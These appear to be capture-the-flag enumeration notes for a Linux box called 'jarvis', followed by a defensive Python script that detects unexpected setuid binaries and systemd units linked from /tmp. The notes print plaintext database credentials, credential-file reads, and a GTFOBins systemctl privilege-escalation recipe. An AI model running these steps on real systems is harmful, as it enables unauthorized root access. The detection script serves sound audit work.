6 box enum www-data
CMD: cat connection.php
<?php
$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
?>
www-data@jarvis:/var/www/html$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
www-data@jarvis:/var/www/html$ mysql -u DBadmin -p
Server version: 10.1.37-MariaDB-0+deb9u1 Debian 9.6
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| hotel              |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
# hotel only has 1 table: room; nothing else in it.
www-data@jarvis:/var/www/html$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
SuidEnum
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/bin/systemctl
------------------------------
[#] SUID Binaries in GTFO bins list (Hell Yeah!)
------------------------------
-~> https://gtfobins.github.io/gtfobins/systemctl/#suid
------------------------------
[&] Manual Exploitation (Binaries which create files on the system)
------------------------------
[&] Systemctl ( /bin/systemctl )
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
------------------------------
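The two findings above (a setuid /bin/systemctl, and the GTFOBins trick of linking a unit file from /tmp) are exactly what a host audit should catch. The following Python script is an added example written for this page, not part of the original notes or of any tool shown here; it flags setuid binaries missing from a baseline and systemd unit links whose target sits in a world-writable directory. The EXPECTED_SUID baseline and WRITABLE_ROOTS list are assumptions chosen for illustration, not values from the page.

```python
#!/usr/bin/env python3
"""Added audit example (not from the original writeup).

Two checks, kept as pure functions so they can run over constructed input:
  1. setuid binaries that are not in an expected baseline (e.g. a SUID /bin/systemctl);
  2. systemd unit links under /etc/systemd/system whose target lives in a
     world-writable location such as /tmp, which is what
     `systemctl link /tmp/<unit>.service` leaves behind.
"""
import os
import stat

# Assumption: a minimal set of setuid binaries normally present on Debian-like hosts.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

# Assumption: directories any local user can write to; a unit linked from here is suspect.
WRITABLE_ROOTS = ("/tmp", "/var/tmp", "/dev/shm", "/home")


def unexpected_suid(binaries, baseline=EXPECTED_SUID):
    """Return the sorted subset of setuid binary paths that are not in the baseline."""
    return sorted(set(binaries) - set(baseline))


def find_suid_binaries(roots=("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")):
    """Walk the given roots and return real paths of regular files with the setuid bit set."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # unreadable or vanished entry; skip it
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append(os.path.realpath(path))
    return found


def suspicious_unit_links(links, writable_roots=WRITABLE_ROOTS):
    """links: iterable of (link_path, target_path) pairs.

    Return the pairs whose target resolves under a writable root. Targets are
    normalised first so that '/tmp/../lib/...' is not misjudged as living in /tmp.
    """
    hits = []
    for link, target in links:
        norm = os.path.normpath(target)
        if any(norm == r or norm.startswith(r + os.sep) for r in writable_roots):
            hits.append((link, norm))
    return hits


def collect_unit_links(unit_dir="/etc/systemd/system"):
    """Return (link, absolute_target) pairs for every symlink under unit_dir,
    including the *.wants/ directories that `systemctl enable` populates."""
    pairs = []
    for dirpath, _dirs, files in os.walk(unit_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.readlink(path)
                if not os.path.isabs(target):
                    # relative symlink: resolve it against the directory holding the link
                    target = os.path.join(dirpath, target)
                pairs.append((path, target))
    return pairs


if __name__ == "__main__":
    for binary in unexpected_suid(find_suid_binaries()):
        print(f"[SUID] not in baseline: {binary}")
    for link, target in suspicious_unit_links(collect_unit_links()):
        print(f"[UNIT] {link} -> {target} (target in writable location)")
```

Run it as root on the host being audited; on a box like this one it would report `/bin/systemctl` as an unexpected setuid binary, and any unit linked from `/tmp` would show up under `[UNIT]`. Normalising the link target before the prefix check matters: a comparison on the raw string would miss `/tmp/../lib/systemd/system/x.service` in one direction and misfire on `/tmpfoo` in the other.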